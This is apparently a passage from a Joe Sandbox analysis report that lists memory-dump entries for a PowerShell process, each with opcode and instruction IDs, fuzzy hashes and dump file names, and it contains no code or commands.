                                                                                                                                              • Instruction ID: 4f02e8f24eaa4f24136073a0cffc03b4f752890a95a24c3c9aee8ed4c68d30e3
                                                                                                                                              • Opcode Fuzzy Hash: a1f00c293bcfbce6f4b9bceaade256a5758ad1344ad6c6bbea5ca2a9669373e4
                                                                                                                                              • Instruction Fuzzy Hash: 7B1104F1A10B4AEFCB24DF59C540BBAB7F9EF89711F44816AD5088B292D330D880DB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ad475c141fa63b2bbc46e94b82ca7bcf2f08a24e41bb485c208e9210d5e5b3bc
                                                                                                                                              • Instruction ID: f6a8eb98879f66014511770e26168ea3da5821a474231f10b1bc58ca1caaca43
                                                                                                                                              • Opcode Fuzzy Hash: ad475c141fa63b2bbc46e94b82ca7bcf2f08a24e41bb485c208e9210d5e5b3bc
                                                                                                                                              • Instruction Fuzzy Hash: 88219D718053858FDB11CF69C5047DABFF4EF09314F1880AEC088A7252D339A504CBA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1936515267.000000000495D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0495D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_495d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e1f81e3a48462dfb41794e3d5847c8f8df0bd66c26dd441896e995f7946e6986
                                                                                                                                              • Instruction ID: 5e5b6f54fbd1907ec00f90b4d70b87cc52769b2c51f3dd3f6379c2698305a57f
                                                                                                                                              • Opcode Fuzzy Hash: e1f81e3a48462dfb41794e3d5847c8f8df0bd66c26dd441896e995f7946e6986
                                                                                                                                              • Instruction Fuzzy Hash: 5E215C76504240DFCF16CF50D9C4B16BF72FB84324F28C5A9DD494A66AC33AE46ACBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 53259afd904eca8159bc45710d60cb91744974f2809140e5743ac686a4721015
                                                                                                                                              • Instruction ID: 735bb3e3504ba72faf8ffb48898b6962ee5c410419dbb61e317c0cf1888a7e2d
                                                                                                                                              • Opcode Fuzzy Hash: 53259afd904eca8159bc45710d60cb91744974f2809140e5743ac686a4721015
                                                                                                                                              • Instruction Fuzzy Hash: 0711D6316083848FE715DF79D45869A7FF4EF46210F1488EED08ACB662DB34B845CB10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1936515267.000000000495D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0495D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_495d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7990352aed4072c09095ef2a1025238342d23bb705e09bcee6ece32be69e0e97
                                                                                                                                              • Instruction ID: ad800eadfbc54000151eea049bf62ce4860973a76550ec0311e1c2d0dedf2411
                                                                                                                                              • Opcode Fuzzy Hash: 7990352aed4072c09095ef2a1025238342d23bb705e09bcee6ece32be69e0e97
                                                                                                                                              • Instruction Fuzzy Hash: F4119075504280DFDB15DF14D5C4B15BB62FB44328F38C6A9DC494B66AC33AE44ACB51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5e01b5b72955a9bba2dca6a2881f943d2f9ef2c44a67594ec6e5ef971c1b0543
                                                                                                                                              • Instruction ID: 85188cf5eb359509fc8c0ff32233827084ac9c4de353279218e60966e686effe
                                                                                                                                              • Opcode Fuzzy Hash: 5e01b5b72955a9bba2dca6a2881f943d2f9ef2c44a67594ec6e5ef971c1b0543
                                                                                                                                              • Instruction Fuzzy Hash: FD11A035A06144CFCB05CB75E4584ED7BB6EF89210B2C006ED4469B362DA306841CBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5f765e5f51db482e9453d4ee4869948081fe4eae1b9f2cb59681c02b1b14a19b
                                                                                                                                              • Instruction ID: fe80725b055036581bcbb08ad7b5d86bc7b4632c1f37e022b40beb0f7ae5f36f
                                                                                                                                              • Opcode Fuzzy Hash: 5f765e5f51db482e9453d4ee4869948081fe4eae1b9f2cb59681c02b1b14a19b
                                                                                                                                              • Instruction Fuzzy Hash: 681148B59003498FEB20CF9AC9047DAFBF8EF48314F24846DD558A7241D779E544CBA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 771c46187cb78ca09b88954d6c7cce60a8522d1d204139823d752e44395cd4e7
                                                                                                                                              • Instruction ID: 55cbab0b19e6398e84f3d47b7c12792d600fe9b4adf1793b7adf06a31b536ccd
                                                                                                                                              • Opcode Fuzzy Hash: 771c46187cb78ca09b88954d6c7cce60a8522d1d204139823d752e44395cd4e7
                                                                                                                                              • Instruction Fuzzy Hash: 241105342047508FC768DF39D08086ABBF6EF8931932089ADD48A8B7A1DB36E845CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1936515267.000000000495D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0495D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_495d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7b588c1310ef5b3cb7d151951a5618b6b96d8590ee9bea6153389088c821e731
                                                                                                                                              • Instruction ID: aa5238bb72549f117536ea333592707bf6001921812c13d9ac610345388a0189
                                                                                                                                              • Opcode Fuzzy Hash: 7b588c1310ef5b3cb7d151951a5618b6b96d8590ee9bea6153389088c821e731
                                                                                                                                              • Instruction Fuzzy Hash: EC0126315043009FE710CF31EC84B67BB9CDF41324F28C62AEC094B292D279A901CBB2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1936515267.000000000495D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0495D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_495d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7e70ad905fe10f9862c69e4971e23355c2f5bb565236d4ab7c8306d7fa5804ed
                                                                                                                                              • Instruction ID: 34acae0e0c5cb0f786986ab5ca4c906e504b0ffc6c9c5b3f3272c807ba851cd6
                                                                                                                                              • Opcode Fuzzy Hash: 7e70ad905fe10f9862c69e4971e23355c2f5bb565236d4ab7c8306d7fa5804ed
                                                                                                                                              • Instruction Fuzzy Hash: 3101406100E3C05FD7128B219994B52BFA89F43224F18C1DBDD988F1A7C2695849CB72
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5700a58bdece9eec3565d7d4789307870f25f42c371eed872f670f4133c666b
                                                                                                                                              • Instruction ID: a83ec4b7f2c109a387caa33efde351a1e9c37bc0ecff843810581230a72decef
                                                                                                                                              • Opcode Fuzzy Hash: f5700a58bdece9eec3565d7d4789307870f25f42c371eed872f670f4133c666b
                                                                                                                                              • Instruction Fuzzy Hash: 42F04C311043405FD312EB35D4408AABBA1EFC635475586BEC4098F761CF31AC0ACBB1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: acf43da1b0db0a32868a77c16dd231bed20c5bfc300c0200faa6eaf4570dd12c
                                                                                                                                              • Instruction ID: 180e0413b0c0be738d94b451cd03fa21c6be6cc6febbe14005c61a436698da06
                                                                                                                                              • Opcode Fuzzy Hash: acf43da1b0db0a32868a77c16dd231bed20c5bfc300c0200faa6eaf4570dd12c
                                                                                                                                              • Instruction Fuzzy Hash: A3F0F0363083649FE7148ABA9C449BBBBEDEF8A220704407EF554C7351CAB1CD0087A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6031b83002424df7cce237a28c77dea29365669d45f6ca663ebbda4087711cfa
                                                                                                                                              • Instruction ID: 5a7c877b3396af5f99bb4728ca80a59e0aeac619f61369905e673f15f52d8c38
                                                                                                                                              • Opcode Fuzzy Hash: 6031b83002424df7cce237a28c77dea29365669d45f6ca663ebbda4087711cfa
                                                                                                                                              • Instruction Fuzzy Hash: 1DF024313053809F8B02567AA8044DA7B7DCEC627231944AFE5998B212DA20AD048BF2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e0319c81497f08b093bfd00e9377348bb7d877c595761af5a39186504bff946
                                                                                                                                              • Instruction ID: ca9cbadacb4ee315b62012f3d00c6ff8d1f543f03dae01157ea8f848ebbaa13c
                                                                                                                                              • Opcode Fuzzy Hash: 4e0319c81497f08b093bfd00e9377348bb7d877c595761af5a39186504bff946
                                                                                                                                              • Instruction Fuzzy Hash: AEF09A323083645F97108A6A9C449BBBAEDEB89620B04407AB954C3352CAB1CD0086A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: df4988bc87d12ad2f6018fbce6a4221048bcf71ffd04e7e7938bd9ef2f36e38d
                                                                                                                                              • Instruction ID: 920c7cb463c25c995ead8fae57927cba45bf0ca8b345de66e0706bafa86a7dca
                                                                                                                                              • Opcode Fuzzy Hash: df4988bc87d12ad2f6018fbce6a4221048bcf71ffd04e7e7938bd9ef2f36e38d
                                                                                                                                              • Instruction Fuzzy Hash: AB01A4756083444FE715AF78E0543AF3FB1EFC2369F1441AEC8565B3A1CA392849CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4377e5d9fdb8cc318817d914c775a78a08398c47c26b1fdb0a1b9a544a5d7082
                                                                                                                                              • Instruction ID: 0277f5b26cc94a566e8bcc875f0ba7c89d45d4a5e1d3d9852026dad8c6ba78c3
                                                                                                                                              • Opcode Fuzzy Hash: 4377e5d9fdb8cc318817d914c775a78a08398c47c26b1fdb0a1b9a544a5d7082
                                                                                                                                              • Instruction Fuzzy Hash: F1F0963014A3805FD317A7399C5046D7FA5DEC62A035A45BFC489CB562CA785C058762
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1936515267.000000000495D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0495D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_495d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9466a66fcda7138022d902958b78590683bb94b28b3aa33003e013ab9441ef60
                                                                                                                                              • Instruction ID: 3a7f85a3978575347fdb68ad326008de1035dd717e9c81b382b24a0e145a1a9b
                                                                                                                                              • Opcode Fuzzy Hash: 9466a66fcda7138022d902958b78590683bb94b28b3aa33003e013ab9441ef60
                                                                                                                                              • Instruction Fuzzy Hash: 39F0E776200600AF9720CF0AD985C22FBAAEBD4674765C56AE85A4B612C671FC41CEA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 900fd6cff7cf7da45b5fa7e3bb03edb22cd035ef52875c64715eaa949cf3d5b2
                                                                                                                                              • Instruction ID: 84606840114dad98b1cf80ff9c1d89460e4f856302b92c9818d9199502df9661
                                                                                                                                              • Opcode Fuzzy Hash: 900fd6cff7cf7da45b5fa7e3bb03edb22cd035ef52875c64715eaa949cf3d5b2
                                                                                                                                              • Instruction Fuzzy Hash: 2BF03A383052808FC3028B29E8548A6BFEAAFCA61531904DAE1C5CB332DA61DC01CB94
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1936515267.000000000495D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0495D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_495d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 06885f8d917f528b798f3f30e8373d191209f9a97d8eedbc7f6383e95ae0210b
                                                                                                                                              • Instruction ID: 5a7f9e447d008d34b70979640ecbb56c0e850228bd46aa17dfabed36e1d48ded
                                                                                                                                              • Opcode Fuzzy Hash: 06885f8d917f528b798f3f30e8373d191209f9a97d8eedbc7f6383e95ae0210b
                                                                                                                                              • Instruction Fuzzy Hash: DCF0F975100680AFD725CF06CD85D23BBBAEB85624B29C599E85A4B362C671FC42CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e66e638df826afe8def91b063709b4ecc7f295eca538b9725fddb33c1c31778b
                                                                                                                                              • Instruction ID: 10404a4c142f502adcab5482ccc19c4df25d711d96ebed18c62385964ceb9f96
                                                                                                                                              • Opcode Fuzzy Hash: e66e638df826afe8def91b063709b4ecc7f295eca538b9725fddb33c1c31778b
                                                                                                                                              • Instruction Fuzzy Hash: B3F0A7312003045BD315EB35D84096BF79AEFC5269B508A7DD5099B750DE71FC058BE0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 81fdbc5a8cebb0be517c0a3b6b29f0b4655b061d5a2a52664b7afd52fbb652d5
                                                                                                                                              • Instruction ID: f39866a8f09f8b0ee511ab317ee026a7335d2d231fd2add099692334415f4fd2
                                                                                                                                              • Opcode Fuzzy Hash: 81fdbc5a8cebb0be517c0a3b6b29f0b4655b061d5a2a52664b7afd52fbb652d5
                                                                                                                                              • Instruction Fuzzy Hash: 46F027756006044BE714BF68E0483AF7B9AEFC0769F10812DCD0647384CE397846C7E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 153b2a3dfa167ebfc171bbc73ace04de7a12db34a40b5b3a9792d80dda309cd2
                                                                                                                                              • Instruction ID: dc5a80408f340d3acca23f04498474c6ba79dc7c14711ae577bef338fff7bcdf
                                                                                                                                              • Opcode Fuzzy Hash: 153b2a3dfa167ebfc171bbc73ace04de7a12db34a40b5b3a9792d80dda309cd2
                                                                                                                                              • Instruction Fuzzy Hash: 3EF090705093448FD7659F74E49C39A7FE5EF42310F0444AED59DCB242DB356884CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 87fb59cc69e988b97f02b3fd7f3ee8f43f2fbdf53f83b47844c1b8740e9ad8c0
                                                                                                                                              • Instruction ID: 4bbc608040e423f19333140659ed715cfc6d3fd774f1cdfe832ee75fae083df6
                                                                                                                                              • Opcode Fuzzy Hash: 87fb59cc69e988b97f02b3fd7f3ee8f43f2fbdf53f83b47844c1b8740e9ad8c0
                                                                                                                                              • Instruction Fuzzy Hash: 34E04F323052521FD71522BE5A206F7779E8FC66A5F4901BBD685E7643EC84AC0183F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7f4ea92d4bdfb96d233441faa0cd20c3756625b3127ef83815e491af4265a0c5
                                                                                                                                              • Instruction ID: 21b9c1a1053df3cdf6fd7906b7c1b25852d46b6d0b05a28b1fb0ba031dec7c3f
                                                                                                                                              • Opcode Fuzzy Hash: 7f4ea92d4bdfb96d233441faa0cd20c3756625b3127ef83815e491af4265a0c5
                                                                                                                                              • Instruction Fuzzy Hash: 5EE0ED397105108F97109B1DD854DA6B7EEEFDE62532504A9E585CB721DA61EC018BD0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1b592fab1b4ab819b2f09fbdf7ef4057141784604a6b0dde057c86ef352f22b2
                                                                                                                                              • Instruction ID: 1bc2fc92668c285610bbf04cd362c4d95315c47a3dcc4b95d40d456ad5c4a3b0
                                                                                                                                              • Opcode Fuzzy Hash: 1b592fab1b4ab819b2f09fbdf7ef4057141784604a6b0dde057c86ef352f22b2
                                                                                                                                              • Instruction Fuzzy Hash: F2E0ED3570A250CBCF0A6BB8B00C2EE3FA2EFC1729F14016ED90A87242CF79084287D4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3c62963b40092a577841f1bb181e6104d23f6cf3c64e3165633e32408f4dc857
                                                                                                                                              • Instruction ID: 6cac7387937837dd0fcb086f44ff41d726cfc82cabc3cc2f6c96d11d05fd242e
                                                                                                                                              • Opcode Fuzzy Hash: 3c62963b40092a577841f1bb181e6104d23f6cf3c64e3165633e32408f4dc857
                                                                                                                                              • Instruction Fuzzy Hash: 35E0DF2230D7D01B970B823F68244A27FBA8AC322030D41FEE0D4CFA53DD62AD0583E6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ee026303d0fbc9f1ea5abaf9a0db6c848e4391b45d35df7492c3fb94348d945f
                                                                                                                                              • Instruction ID: 5997d2914819061240074696251cbd97b7cbff0cee73dfb9df5982df06e1f1ab
                                                                                                                                              • Opcode Fuzzy Hash: ee026303d0fbc9f1ea5abaf9a0db6c848e4391b45d35df7492c3fb94348d945f
                                                                                                                                              • Instruction Fuzzy Hash: E4E0D8312003001B9125F27EEC4042EB78ADFC42A0364883DC50E87650DEB06C0147A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb267664877199904367c8228268778071a4fbe86809a835f9ea371bd53afbb0
                                                                                                                                              • Instruction ID: 15f4e02845c669e6494ddcb876e54878327e8d53ee6b53f9d7fcc0be559bcce1
                                                                                                                                              • Opcode Fuzzy Hash: eb267664877199904367c8228268778071a4fbe86809a835f9ea371bd53afbb0
                                                                                                                                              • Instruction Fuzzy Hash: C3E0D8353062848FC7069778A40C4997BB1DFC72A130901BFD54EC7391CA241C09CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6fe469811fb4837b973d45fde7174b140fd889ff70767044dfd459f339e534ba
                                                                                                                                              • Instruction ID: 245675c6574cdc8572b7d27a88ac5c9b5d39677163315168349cce578e9856c5
                                                                                                                                              • Opcode Fuzzy Hash: 6fe469811fb4837b973d45fde7174b140fd889ff70767044dfd459f339e534ba
                                                                                                                                              • Instruction Fuzzy Hash: C1E06574D01249AF8740DF78C841699FFF0EF45210B5480DEC948D7242EA315542CBD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 945f5a0b2c567c9b02e4830d09e2cfcee5de018ffa4c6745a5f8ff840025fd42
                                                                                                                                              • Instruction ID: c914ffa2da2c8cea6a20fdb7441837f4961166477bc7d0049bf15c653a40f4a6
                                                                                                                                              • Opcode Fuzzy Hash: 945f5a0b2c567c9b02e4830d09e2cfcee5de018ffa4c6745a5f8ff840025fd42
                                                                                                                                              • Instruction Fuzzy Hash: EFF0ED719013049BD764DFB9E49C79B7BE9EB45350F10442DE65EC7241DB356881CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9efab0b146ed87d14a2164dd57b84f3cdeb1795d5de5372cce1c9a8dbddd983d
                                                                                                                                              • Instruction ID: 79ea63a8ff8a3047ab7f4e18ebc635481def1dccbaf1e90747b8a1d6406bf5b0
                                                                                                                                              • Opcode Fuzzy Hash: 9efab0b146ed87d14a2164dd57b84f3cdeb1795d5de5372cce1c9a8dbddd983d
                                                                                                                                              • Instruction Fuzzy Hash: 28E06D3180920ADFCB0AAF75E80E4E97F38FF12341B0100AED45647152EA301A85CBD6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d414ca04ea14eb81ac057211c6a15278652c638cc0475cf712b576746e8a030b
                                                                                                                                              • Instruction ID: 6de2c7ad8a4f2d6dd5029d65aa37d9e550b05dfbede3d50fe248de7500ee2ea5
